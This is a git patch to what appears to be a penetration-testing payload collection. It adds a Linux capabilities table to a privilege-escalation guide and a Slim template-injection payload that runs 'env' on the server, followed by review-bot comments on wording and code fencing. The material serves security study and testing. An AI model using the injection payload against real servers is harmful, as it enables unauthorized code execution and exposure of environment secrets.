From 6f4a28ef664c21350260600f2925b7f6f53c0a0f Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 5 Dec 2019 23:06:53 +0100 Subject: [PATCH] Slim RCE + CAP list --- .../Linux - Privilege Escalation.md | 18 ++++++++++++++++++ Server Side Template Injection/README.md | 8 ++++++++ 2 files changed, 26 insertions(+) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index df74db0..ace5ec4 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -309,6 +309,24 @@ sh-5.0# id uid=0(root) gid=1000(swissky) ``` +| Capabilities name | Description | +|---|---| +| CAP_AUDIT_CONTROL | Allow to enable/disable kernel auditing | +| CAP_AUDIT_WRITE | Helps to write records to kernel auditing log | +| CAP_BLOCK_SUSPEND | This feature can block system suspends | +| CAP_CHOWN | Allow user to make arbitrary change to files UIDs and GIDs | +| CAP_DAC_OVERRIDE | This helps to bypass file read, write and execute permission checks | +| CAP_DAC_READ_SEARCH | This only bypass file and directory read/execute permission checks | +| CAP_FOWNER | This enables to bypass permission checks on operations that normally require the filesystem UID of the process to match the UID of the file | +| CAP_KILL | Allow the sending of signals to processes belonging to others | +| CAP_SETGID | Allow changing of the GID | +| CAP_SETUID | Allow changing of the UID | +| CAP_SETPCAP | Helps to transferring and removal of current set to any PID | +| CAP_IPC_LOCK | This helps to lock memory | +| CAP_MAC_ADMIN | Allow MAC configuration or state changes | +| CAP_NET_RAW | Use RAW and PACKET sockets | +| CAP_NET_BIND_SERVICE | SERVICE Bind a socket to internet domain privileged ports | + ## SUDO Tool: [Sudo Exploitation](https://github.com/TH3xACE/SUDO_KILLER) 
diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index a4f48e7..d8101f9 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -85,6 +85,14 @@ Slim: <%= Dir.entries('/') %> ``` +### Code execution + +Execute code using SSTI for Slim engine. + +```powershell +#{ %x|env| } +``` + ## Java ### Basic injection
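Review bot: in the capabilities hunk the CAP_SETPCAP row describes the pre-2.6.24 semantics; on kernels with file capabilities (Linux 2.6.24 and later) CAP_SETPCAP lets the calling thread add capabilities from its bounding set to its inheritable set, drop capabilities from its bounding set and change the securebits flags, it does not transfer or remove capabilities on other PIDs, so that row should be reworded. Two smaller fixes in the same table: drop the stray leading word in `| CAP_NET_BIND_SERVICE | SERVICE Bind a socket to internet domain privileged ports |`, and correct the grammar in `This only bypass file and directory read/execute permission checks` to "only bypasses". The table is also inserted directly after the closing fence of the previous shell example with no sentence saying what it lists; a one-line lead-in before `| Capabilities name | Description |` would tie it to the section.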
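Review bot: the new Slim block is fenced as `powershell`, but `#{ %x|env| }` is Ruby string interpolation (Slim templates compile to Ruby), so the fence should be tagged `ruby` (or `slim`) for correct highlighting and to match the Ruby examples in the `Slim:` context just above. The lead sentence `Execute code using SSTI for Slim engine.` reads better as "Execute code through SSTI in the Slim engine."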